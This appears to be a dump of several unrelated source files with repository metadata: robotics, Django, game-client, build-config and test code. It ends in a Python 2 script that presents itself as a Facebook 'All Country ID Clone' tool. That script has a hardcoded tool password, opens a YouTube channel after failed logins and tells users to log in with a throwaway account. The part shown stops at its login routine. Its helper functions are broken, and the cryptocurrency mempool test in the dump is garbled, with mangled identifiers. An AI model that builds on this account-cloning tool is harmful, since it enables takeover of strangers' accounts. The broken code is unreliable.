print " "+str(a)
self.mem.add(self.mem.ACTIONS, [action])
plan.advance()
if trace: trace.add_data("ACTION", action)
else:
if verbose >= 1:
print "MIDCA will not select an action this cycle."
self.mem.add(self.mem.ACTIONS, [])
if trace: trace.add_data("ACTION", None)
class Moosact(base.BaseModule):
def init(self, world, mem):
        import zmq  # assumed dependency; the original snippet uses zmq without an explicit import
        context = zmq.Context()
self.publisher = context.socket(zmq.PUB)
self.publisher.bind("tcp://127.0.0.1:5560")
self.mem = mem
self.world = world
def run(self, cycle, verbose = 2):
try:
#get selected actions for this cycle. This is set in the act phase.
actions = self.mem.get(self.mem.ACTIONS)[-1]
        except (TypeError, IndexError):
if verbose >= 1:
print "Simulator: no actions selected yet by MIDCA."
return
if actions:
for action in actions:
if self.world.midca_action_applicable(action):
if verbose >= 2:
print "simulating MIDCA action:", action
if (action.op == "survey"):
argnames = [str(arg) for arg in action.args]
if ("ga1" in argnames):
self.publisher.send_multipart(
[b"M", b"polygon= radial:: x=20, y=-80, radius=20, pts=8, snap=1, label=DUDLEY_LOITER"])
self.world.apply_midca_action(action)
if ("ga2" in argnames):
self.publisher.send_multipart([b"M",b"polygon= radial:: x=150, y=-80, radius=20, pts=8, snap=1, label=DUDLEY_LOITER"])
self.world.apply_midca_action(action)
if ("home" in argnames):
self.publisher.send_multipart([b"M", b"point = 0,0"])
self.world.apply_midca_action(action)
else:
if verbose >= 1:
print "MIDCA-selected action", action, "illegal in current world state. Skipping"
else:
if verbose >= 2:
print "No actions selected this cycle by MIDCA."
|
[
"sravyachowdary1994@gmail.com"
] |
sravyachowdary1994@gmail.com
|
52519de05a1705498f59ab6900fec766342624d4
|
cf98e53c7d74a717a1ccb60d10396f78f2572f82
|
/EMP/EMP/wsgi.py
|
fe7dbac48b66751c7e61d86fbc255de82dec892e
|
[] |
no_license
|
mkm1997/ESCALE
|
f09cb18b0b26ea94bfaccbd10eee3fe81d0d9ee9
|
99a163b25b57d57fb6412a172dd4c51fb0f7ee8a
|
refs/heads/master
| 2020-03-19T05:24:30.592902
| 2018-06-03T17:59:10
| 2018-06-03T17:59:10
| 135,927,715
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
"""
WSGI config for EMP project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "EMP.settings")
application = get_wsgi_application()
|
[
"mmanish184@gmail.com"
] |
mmanish184@gmail.com
|
d9f3996fc6b6e11676bb6d73c8c96a5562d5fcec
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/Scaleform/daapi/view/lobby/tank_setup/ammunition_setup_vehicle.py
|
572f09c20630d76920f59564d58da4e89187b639
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 972
|
py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/tank_setup/ammunition_setup_vehicle.py
from CurrentVehicle import g_currentVehicle
from helpers import dependency
from skeletons.gui.shared import IItemsCache
class _TankSetupVehicle(object):
__slots__ = ('__vehicle',)
_itemsCache = dependency.descriptor(IItemsCache)
def __init__(self):
super(_TankSetupVehicle, self).__init__()
self.__vehicle = None
return
def setVehicle(self, value):
self.__vehicle = value
@property
def item(self):
return self.__vehicle or g_currentVehicle.item
@property
def defaultItem(self):
return g_currentVehicle.item if g_currentVehicle.isPresent() else None
def isPresent(self):
return self.__vehicle is not None
def dispose(self):
self.__vehicle = None
return
g_tankSetupVehicle = _TankSetupVehicle()
|
[
"StranikS_Scan@mail.ru"
] |
StranikS_Scan@mail.ru
|
223fdee3194358515d95388c141e4d2e97b7c2c5
|
6fecc74a147ff8c3966bb94a491aae6e26e3b439
|
/config/base_config.py
|
77bf7e15d09abb7d10e3997aa2fec34c61bdfb4a
|
[] |
no_license
|
lukang287/ws
|
13adddc0a7e2b8b920137972f132ec8df2d135ba
|
26626849c683caa89489939b279c50116e77baf9
|
refs/heads/master
| 2020-04-20T06:11:56.843679
| 2019-02-01T09:46:12
| 2019-02-01T09:46:12
| 168,676,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
py
|
WS_SERVER_PORT_ONE = 5001
WS_SERVER_PORT_MUTIL = 5000
# MQ configuration: queues give one-to-one delivery without loss; topics are publish/subscribe (one-to-many) and may drop messages
MQ_BROKERS = [('106.13.4.172', 61613)]
LOG_QUEUE_NAME = '/queue/log'
CMD_QUEUE_NAME = '/queue/cmd'
NOTIFY_TOPIC_NAME = '/topic/notify'
|
[
"lukang@lightinthebox.com"
] |
lukang@lightinthebox.com
|
45be380484fe42397031b27daa726ba233ca0a75
|
1b66bcf36d7578c3b1dfb5b1ce1570aa46596072
|
/src/gameapp/round/controller.py
|
463728ed40731ec5f3b6700f0f698d67ba056882
|
[] |
no_license
|
germanoa/elyphoot
|
c8e2f225d0649bd522c52c97823bb895409ac2cf
|
8648a9584d5da03e31b899bad2db8842f0e50233
|
refs/heads/master
| 2016-09-10T19:02:45.576423
| 2012-06-22T22:06:08
| 2012-06-22T22:06:08
| 32,347,865
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,166
|
py
|
import gameapp.match.controller
import gameapp.season.controller
from gameapp.models import Round
def run_round(season, game_round):
if game_round is None or game_round.resolved:
return False
results = map(gameapp.match.controller.run_match, game_round.matches.all())
for r in results:
if r:
            return True  # some match is still unresolved
game_round.resolved = True
game_round.save()
if season is not None:
if game_round.round_number >= len(season.rounds.all()):
season.completed = True
season.current_round = None
season.winner = gameapp.season.controller.get_team_table(season, 1)[0]
else:
next_round = game_round.round_number + 1
season.current_round = season.rounds.get(round_number=next_round)
season.save()
    return False  # all matches resolved
def get_matches_for_serie(round, serie):
return round.matches.filter(serie=serie)
def create_rounds(season):
matches_serie_a = gameapp.match.controller.create_matches(season.teams.filter(serie=1))
matches_serie_b = gameapp.match.controller.create_matches(season.teams.filter(serie=2))
matches_serie_c = gameapp.match.controller.create_matches(season.teams.filter(serie=3))
matches_serie_d = gameapp.match.controller.create_matches(season.teams.filter(serie=4))
game_round = None
for match_count in range(len(matches_serie_a)):
if match_count % 4 == 0:
if game_round is not None:
game_round.save()
game_round = Round(round_number=((match_count / 4) + 1), \
resolved=False)
game_round.save()
season.rounds.add(game_round)
game_round.matches.add(matches_serie_a[match_count])
game_round.matches.add(matches_serie_b[match_count])
game_round.matches.add(matches_serie_c[match_count])
game_round.matches.add(matches_serie_d[match_count])
game_round.save()
season.current_round = season.rounds.get(round_number=1)
season.save()
|
[
"raphaelbaldi@gmail.com@cf4997be-b4d0-2e88-bcf9-847bdaf59e33"
] |
raphaelbaldi@gmail.com@cf4997be-b4d0-2e88-bcf9-847bdaf59e33
|
924ce17d10d664bfe831de2f8652c0305d50c24d
|
33546aee6429d5b8f19a02e14699b6ebb5b34af8
|
/src/ui/surface/surface.gyp
|
a6ad39b07e77af7c516496738acd933474cdbba8
|
[
"BSD-3-Clause"
] |
permissive
|
mYoda/CustomBrs
|
bdbf992c0db0bf2fd1821fa1fd0120ac77ffc011
|
493fc461eb7ea7321c51c6831fe737cfb21fdd3e
|
refs/heads/master
| 2022-11-22T09:11:37.873894
| 2022-11-10T10:02:49
| 2022-11-10T10:02:49
| 24,951,822
| 0
| 1
| null | 2022-11-02T14:39:34
| 2014-10-08T17:22:30
|
C++
|
UTF-8
|
Python
| false
| false
| 1,100
|
gyp
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'target_defaults': {
'conditions': [
['use_x11 == 1', {
'include_dirs': [
'../../third_party/khronos',
],
}],
],
},
'targets': [
{
'target_name': 'surface',
'type': '<(component)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'../../skia/skia.gyp:skia',
'../base/ui_base.gyp:ui_base',
'../gfx/gfx.gyp:gfx_geometry',
'../gl/gl.gyp:gl',
],
'sources': [
'accelerated_surface_mac.cc',
'accelerated_surface_mac.h',
'surface_export.h',
'transport_dib.h',
'transport_dib.cc',
'transport_dib_posix.cc',
'transport_dib_win.cc',
],
'defines': [
'SURFACE_IMPLEMENTATION',
],
},
],
}
|
[
"nechayukanton@gmail.com"
] |
nechayukanton@gmail.com
|
7ba620607c2587cb5f225e039c698cae340a4015
|
3c0f8b3ff8e15d354a92ab060a9bda187f1eb4af
|
/blog/migrations/0004_blogcategory_parent.py
|
fcdf3d2bce1cdf390d1b68f1a2d3d0b5c1b6b873
|
[] |
no_license
|
TamannaArora/Blogging
|
cc9baedb0bfe1e6b19923fdcae749dbafd740d54
|
57467e4c5f311db45878a588e94eaac91ab160e6
|
refs/heads/master
| 2022-12-15T04:53:56.092112
| 2018-09-24T06:35:40
| 2018-09-24T06:35:40
| 149,570,576
| 0
| 0
| null | 2022-12-07T23:52:22
| 2018-09-20T07:38:17
|
Python
|
UTF-8
|
Python
| false
| false
| 694
|
py
|
# Generated by Django 2.0.8 on 2018-09-07 10:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_blogpage_author'),
]
operations = [
migrations.AddField(
model_name='blogcategory',
name='parent',
field=models.ForeignKey(blank=True, help_text='Categories, unlike tags, can have a hierarchy. You might have a Jazz category, and under that have children categories for Bebop and Big Band. Totally optional.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='blog.BlogCategory'),
),
]
|
[
"tamanna.arora@netsolutions.com"
] |
tamanna.arora@netsolutions.com
|
bb0dcab2d93ab44998895a25f23b7638074da429
|
32572cb805af797a3190311fdbe7b50c28f3e6ef
|
/reptilian.py
|
47087223257de45030d2387ef3c5bfbbfd9dd0f5
|
[] |
no_license
|
weiqifa0/python-weather
|
b629d10f9b8ab82bfe0cdaeddfb46b108caf32f3
|
b3eb06d67ad992a57d2b8ee91da30bb7868cc9b0
|
refs/heads/master
| 2020-03-29T01:02:36.175886
| 2018-09-19T00:34:47
| 2018-09-19T00:34:47
| 149,368,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 423
|
py
|
from getContent import *
from getData import *
from writeDate import *
if __name__ == '__main__':
url = 'http://www.weather.com.cn/weather/101210101.shtml'
    html = getContent(url)  # fetch the page HTML
    result = getData(html)  # parse the page and extract the data we need
    writeData(result, 'E:/project/python/Reptilian/weather.csv')  # write the data to a CSV file
    print('my first python file')
|
[
"329410527@qq.comgit config --global user.name"
] |
329410527@qq.comgit config --global user.name
|
45a82527d6560beaeb597f6c84a2d895aa67a527
|
49d843353d464410420f98bfffced7b9ffcde351
|
/PycharmProjects/Stage 2/day18/thread_1.py
|
bdfda35db27ac1b46a1cb5f8cee0168d1e3fc7c5
|
[] |
no_license
|
davidlu2002/AID2002
|
a634232a4c23e6541f1b164167d6f0dcdd77d95e
|
4eb6854493aea5440b4736acda29d99047c7db81
|
refs/heads/master
| 2022-10-18T14:56:56.673308
| 2020-06-10T02:14:10
| 2020-06-10T02:14:10
| 270,518,044
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 665
|
py
|
"""
thread_1.py  thread usage example 1
"""
from threading import Thread
from time import sleep
import os
a = 1  # variable owned by the main thread
def fun():
for i in range(3):
        print(os.getpid(), "running program 1")
        sleep(2)
    print("program 1 finished")
    global a
    print("a =", a)
    a = 10000  # change the main thread's variable from inside the child thread
# create a thread object
t = Thread(target=fun)
t.start()  # start the thread
# the main thread and the child thread run concurrently
for i in range(4):
    print(os.getpid(), "running program 2")
    sleep(1)
print("program 2 finished")
t.join()  # wait for the thread to finish
print("main a:", a)  # all threads share the same memory space
|
[
"2568899732@qq.com"
] |
2568899732@qq.com
|
64dacea4bbd3545e9a02839b932ed4f059fae753
|
d2b4cbf47cdbdc74a74c348043aaf8bef9b56904
|
/crepes_bretonnes/blog/templatetags/blog_random.py
|
3fc1ab132d150b73e8f383cef7a4a01b60358d82
|
[] |
no_license
|
chadyred/breton-py
|
25fbe08a3180d72a942ceaf4b2b04991b8868a1f
|
06b61b98ca2d7160fd236852c490faf3536bb5f8
|
refs/heads/master
| 2021-01-12T17:28:31.320452
| 2017-05-29T06:45:13
| 2017-05-29T06:45:13
| 71,578,361
| 0
| 0
| null | 2017-05-26T08:03:13
| 2016-10-21T15:35:13
|
Python
|
UTF-8
|
Python
| false
| false
| 329
|
py
|
#-*- coding: utf-8 -*-
from __future__ import unicode_literals
from random import randint
from django import template
register = template.Library()
@register.simple_tag
def random(begin, end):
try:
return randint(int(begin), int(end))
except Exception as e:
        raise ValueError("Two int arguments (begin, end) are required: %s" % e)
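# Illustrative template usage (not in the original file): the tag name defaults
# to the function name and the library is loaded via this module's file name:
#   {% load blog_random %}
#   {% random 1 6 %}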
|
[
"fcellier@norsys.fr"
] |
fcellier@norsys.fr
|
002dc2a20200db290f59b8d827b0e30db0263dda
|
7f059f64638762a4af033553e10fe0707dacbbcc
|
/archive/python/backtracking/Permutation.py
|
5e1a1acae68632ca4dca1b31e355bf0a306c13d1
|
[
"MIT"
] |
permissive
|
sureleo/leetcode
|
df9099d895faaa7f14aa5c0309cbd603ccf22e2f
|
190b81817c7e7c564f5f1299b8c5638d10d2a511
|
refs/heads/master
| 2021-01-10T18:26:24.372568
| 2019-12-24T17:45:40
| 2019-12-24T17:45:40
| 28,789,872
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
class Solution:
# @param num, a list of integer
# @return a list of lists of integers
def __init__(self):
self.num = []
self.result = []
def permute(self, num):
self.num = num
self.dfs([], self.num)
return self.result
def dfs(self, valuelist, num_list):
if len(valuelist) == len(self.num):
self.result.append(valuelist)
return
for i in xrange(len(num_list)):
self.dfs(valuelist+[num_list[i]], num_list[0:i] + num_list[i+1:])
if __name__ == "__main__":
solution = Solution()
print solution.permute([1, 2, 3])
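# Quick cross-check (illustrative, not part of the original solution): the DFS
# output should match itertools.permutations up to ordering, e.g.
#   import itertools
#   assert sorted(Solution().permute([1, 2, 3])) == \
#          sorted(map(list, itertools.permutations([1, 2, 3])))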
|
[
"surezeroleo@gmail.com"
] |
surezeroleo@gmail.com
|
f232197bf4bdd9302fbe97431575ee55b7c2c3d1
|
89dbaf6b4e7e79441a1bcfdce7b645179209d2ea
|
/qa/rpc-tests/mempool_resurrect_test.py
|
a0096eaa1bc84f96b32d6075f7db303b255cc123
|
[
"MIT"
] |
permissive
|
dzcoin/DzCoinMiningAlgorithm
|
cd7f7af778f350442e3b1154ae34ec1916a46b2a
|
b0294cf5ac893fe907b08105f1aa826c3da464cf
|
refs/heads/master
| 2021-01-09T20:57:23.439272
| 2016-08-14T17:33:38
| 2016-08-14T17:33:38
| 65,678,189
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,414
|
py
|
#!/usr/bin/env python2
# Copyright (c) 2014 The Dzcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# test resurrection of mined transactions when
# the blockchain is re-organized.
#
from test_framework.test_framework import dzcointestframework
from test_framework.util import *
import os
import shutil
# create one-input, one-output, no-fee transaction:
class mempoolcoinbasetest(dzcointestframework):
def setup_network(self):
# just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = false
def create_tx(self, from_txid, to_address, amount):
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
signresult = self.nodes[0].signrawtransaction(rawtx)
assert_equal(signresult["complete"], true)
return signresult["hex"]
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# spend block 1/2/3's coinbase transactions
# mine a block.
# create three more transactions, spending the spends
# mine another block.
# ... make sure all the transactions are confirmed
# invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# mine a new block
# ... make sure all the transactions are confirmed again.
b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends1_raw = [ self.create_tx(txid, node0_address, 50) for txid in coinbase_txids ]
spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [ self.create_tx(txid, node0_address, 49.99) for txid in spends1_id ]
spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# use invalidateblock to re-org back; all transactions should
# end up unconfirmed and back in the mempool
for node in self.nodes:
node.invalidateblock(blocks[0])
        # mempool should now contain all the re-orged (unconfirmed) transactions again
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
mempoolcoinbasetest().main()
|
[
"dzgrouphelp@foxmail.com"
] |
dzgrouphelp@foxmail.com
|
cf841b76b1eb5e60fcea019a4d0aafa4043d1dfd
|
d778a0da8ab7157dc76d42a709367f37161fa565
|
/bookmarks/account/forms.py
|
35950adad9ed652ab900fc57d45ee98ce9f5d329
|
[] |
no_license
|
AmazingSkyLine/Django-By-Example-Project
|
86780b8a6e7e86ac0d881993dc7a6baae1b5a9b4
|
689f300169fba70da56e44ce4e8468df35f2f7a9
|
refs/heads/master
| 2021-05-12T09:52:06.624892
| 2018-02-28T16:24:26
| 2018-02-28T16:24:26
| 117,336,269
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
from django import forms
from django.contrib.auth.models import User
from .models import Profile
# Login form
class LoginForm(forms.Form):
username = forms.CharField(label="用户名")
password = forms.CharField(label="密码", widget=forms.PasswordInput)
# Registration form
class UserRegistrationForm(forms.ModelForm):
password = forms.CharField(label="输入密码", widget=forms.PasswordInput)
password2 = forms.CharField(label="再次输入密码", widget=forms.PasswordInput)
class Meta:
model = User
fields = ('username', 'email', 'first_name')
def clean_password2(self):
        cd = self.cleaned_data  # form data
if cd['password'] != cd['password2']:
raise forms.ValidationError('密码不匹配!')
return cd['password2']
class UserEditForm(forms.ModelForm):
class Meta:
model = User
fields = ('first_name', 'email')
class ProfileEditForm(forms.ModelForm):
class Meta:
model = Profile
fields = ('date_of_birth', 'photo')
|
[
"15002963138@163.com"
] |
15002963138@163.com
|
f30cc6d0be2770d0b1aa2a10eecb5907a6985c08
|
638fabe27947b1b9bfc8b357d94cb7faf82c1f8d
|
/harshudubey.py
|
966bd50a563dddaf114c69f7d26b1ee484402e57
|
[] |
no_license
|
harshudubey/harahu
|
494ad353d608311812ec967a42296bee330141ff
|
a5567a0bad7868fd87f1eda4d45b78bbd7b3f2b4
|
refs/heads/master
| 2022-04-28T08:31:22.053346
| 2020-04-19T00:09:09
| 2020-04-19T00:09:09
| 256,864,102
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,031
|
py
|
#!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To lovehacker
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.07)
#Dev:harshu_dubey
##### LOGO #####
logo = """
\033[1;91m:•◈ ░█ ▄▀█ █▀█ █▀ █░█ █░█ ▀▄▀:•◈•
\033[1;91m:•◈•█▀█ █▀█ █▀▄ ▄█ █▀█ █▄█ █░█:•◈•
\033[1;91m:•◈•█▀█ █░█ █▀▀ █░█ █ █▄▀ ▄▀█:•◈•
\033[1;91m:•◈•█▀▄ █▄█ █▄▄ █▀█ █ █░█ █▀█:•◈•
\033[1;91m:•◈•
\033[1;91m:•◈•█╗░░██╗░█████╗░██████╗░░██████╗██╗░░██╗██╗░░░██╗:•◈•
\033[1;91m:•◈•██║░░██║██╔══██╗██╔══██╗██╔════╝██║░░██║██║░░░██║:•◈•
\033[1;91m:•◈•███████║███████║██████╔╝╚█████╗░███████║██║░░░██║:•◈•
\033[1;91m:•◈•██╔══██║██╔══██║██╔══██╗░╚═══██╗██╔══██║██║░░░██║:•◈•
\033[1;91m:•◈•██║░░██║██║░░██║██║░░██║██████╔╝██║░░██║╚██████╔╝:•◈•
\033[1;91m:•◈•╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░╚═╝╚═════╝░╚═╝░░╚═╝░╚═════╝░:•◈•
\033[1;91m:•◈•
\033[1;
\033[1;91m:•◈•
\033[1;94m:•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;91mKali.linux\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ •◈•
\033[1;91m:•◈•
\033[1;91m:•◈•██████╗░██╗░░░██╗██████╗░███████╗██╗░░░██╗
\033[1;91m:•◈•██╔══██╗██║░░░██║██╔══██╗██╔════╝╚██╗░██╔╝word liest
\033[1;91m:•◈•██║░░██║██║░░░██║██████╦╝█████╗░░░╚████╔╝░
\033[1;91m:•◈•██║░░██║██║░░░██║██╔══██╗██╔══╝░░░░╚██╔╝░░
\033[1;91m:•◈•╔╝╚██████╔╝██████╦╝███████╗░░░██║░░░
\033[1;91m:•◈•╚═════╝░░╚═════╝░╚═════╝░╚══════╝░░░╚═╝░░░
\033[1;91m:•◈•░░░░░██╗██╗
\033[1;91m:•◈•░░░░░██║██║
\033[1;91m:•◈•░░░░░██║██║
\033[1;91m:•◈•██╗░░██║██║
\033[1;91m:•◈•╚█████╔╝██║
\033[1;91m:•◈•░╚════╝░╚═╝
\033[1;91m:•◈•
\033[1;91m:•◈•
\033[1;91m:•◈•
\033[1;91m:•◈•
\033[1;94m:•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;91mKali.linux\033[1;94m•◈•▬ ▬•◈•"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;94m•◈••◈••◈•\033[1;94m◈••◈••◈••◈••◈•◈••◈••◈••◈••◈\033[1;94m•◈••◈••◈•
\033[1;94m•◈••◈••◈•\033[1;95m. █░▒█ ░█▀▀█ ▒█▀▀█ ▒█▀▀▀█ ▒█░▒█ ▒█░▒█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ▒█▀▀█ ▒█▄▄█ ▒█▄▄▀ ░▀▀▀▄▄ ▒█▀▀█ ▒█░▒█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ▒█░▒█ ▒█░▒█ ▒█░▒█ ▒█▄▄▄█ ▒█░▒█ ░▀▄▄▀ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ▀▄▒▄▀ █▀▀█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ░▒█░░ ░░▀▄ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ▄▀▒▀▄ █▄▄█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.▒█▀▀█ ▒█░▒█ ▒█▀▀█ ▒█░▒█ ▀█▀ ▒█░▄▀ ░█▀▀█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.▒█▄▄▀ ▒█░▒█ ▒█░░░ ▒█▀▀█ ▒█░ ▒█▀▄░ ▒█▄▄█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.▒█░▒█ ░▀▄▄▀ ▒█▄▄█ ▒█░▒█ ▄█▄ ▒█░▒█ ▒█░▒█ \033[1;94m•◈••◈••◈•\033[1;95m.
\
\033[1;94m•◈••◈••◈•\033[1;95m. █╗███╗░░██╗██████╗░██╗░█████╗░███╗░░██╗\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.██║████╗░██║██╔══██╗██║██╔══██╗████╗░██║\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.██║██╔██╗██║██║░░██║██║███████║██╔██╗██║\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.██║██║╚████║██║░░██║██║██╔══██║██║╚████║\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.██║██║░╚███║██████╔╝██║██║░░██║██║░╚███║\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.╚═╝╚═╝░░╚══╝╚═════╝░╚═╝╚═╝░░╚═╝╚═╝░░╚══╝\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m . \033[1;94m•◈••◈••◈•
\033[1;94m•◈••◈••◈•\033[1;95m \033[1;94m•◈••◈••◈•
\033[1;94m•◈••◈••◈•\033[1;95m. \033[1;94m•◈••◈••◈•
\033[1;94m•◈••◈••◈••◈•\033[1;94m••◈••◈••◈••◈••◈••◈••◈••◈•\033[1;94m•◈••◈••◈••◈•
\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;94mKalilinux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"""
jalan('\033[1;95m▬10%')
jalan("\033[1;95m▬▬20%")
jalan('\033[1;95m▬▬▬30%')
jalan('\033[1;95m▬▬▬▬40%')
jalan("\033[1;95m▬▬▬▬▬50%")
jalan("\033[1;95m▬▬▬▬▬▬60% \033[1;91mAll Country ID Clone")
jalan('\033[1;95m▬▬▬▬▬▬▬70%')
jalan('\033[1;95m▬▬▬▬▬▬▬▬80%')
jalan('\033[1;95m▬▬▬▬▬▬▬▬▬90%')
jalan('\033[1;95m▬▬▬▬▬▬▬▬▬100%')
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;94mkalilinux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
CorrectUsername = "harshu"
CorrectPassword = "ruchika"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;91m📋 \x1b[1;91mTool Username \x1b[1;91m»» \x1b[1;92m")
if (username == CorrectUsername):
password = raw_input("\033[1;91m🗝 \x1b[1;91mTool Password \x1b[1;91m»» \x1b[1;92m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:harshu_ruchika
time.sleep(2)
loop = 'false'
else:
print "\033[1;93mWrong Password"
os.system('xdg-open https://www.youtube.com/channel/UC3S835IJhJvZiTL04O0AHBg')
print "\033[1;94mWrong Username"
os.system('xdg-open https://www.youtube.com/channel/UC3S835IJhJvZiTL04O0AHBg')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
jalan(' \033[1;91mWarning: \033[1;95mDo Not Use Your Personal Account' )
jalan(' \033[1;91mWarning: \033[1;95mUse a New Account To Login' )
jalan(' \033[1;91mWarning: \033[1;95mTermux Old Version install 0.63✅' )
print "\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;91mKali.linux\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
